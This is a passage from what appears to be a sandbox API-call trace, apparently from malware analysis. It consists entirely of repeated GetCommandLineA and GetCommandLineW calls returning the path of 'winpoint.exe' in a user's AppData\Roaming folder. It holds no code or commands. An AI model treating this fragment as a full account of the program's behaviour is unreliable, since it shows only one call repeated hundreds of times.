returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.646] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.648] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.649] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.650] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.651] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.652] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () 
